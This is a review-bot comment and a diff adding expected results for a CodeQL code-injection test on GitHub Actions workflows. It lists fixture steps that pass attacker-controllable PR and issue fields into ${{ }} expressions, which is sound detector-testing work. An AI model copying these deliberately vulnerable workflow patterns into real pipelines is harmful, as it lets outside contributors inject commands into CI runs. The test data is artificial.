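Review bot: The expected row for the step at test19.yml:105 records the same command as the step at test19.yml:59, `gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body'`, while its neighbours at lines 95 and 100 query `/repos/test/test/issues/...`. The last case of the issues-API group therefore looks like a copy of the pulls one, and the issue-comments endpoint gets no row of its own in these results. If that reading of the fixture is right (test19.yml itself is not visible in this part of the patch), the step should call `gh api /repos/test/test/issues/${PR_NUMBER}/comments --jq '.[].body'` and the `.expected` files should be regenerated, so that a regression in that source model fails the test. The same duplicated row recurs in the `#select` hunk below and in the `edges` and `nodes` hunks of CodeInjectionMedium.expected.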
@@ -643,6 +733,24 @@ subpaths | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 15d526ca7b4..6afef323ff0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} 
"$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| 
.github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | 
.github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api 
/repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref 
[head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq 
'.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R 
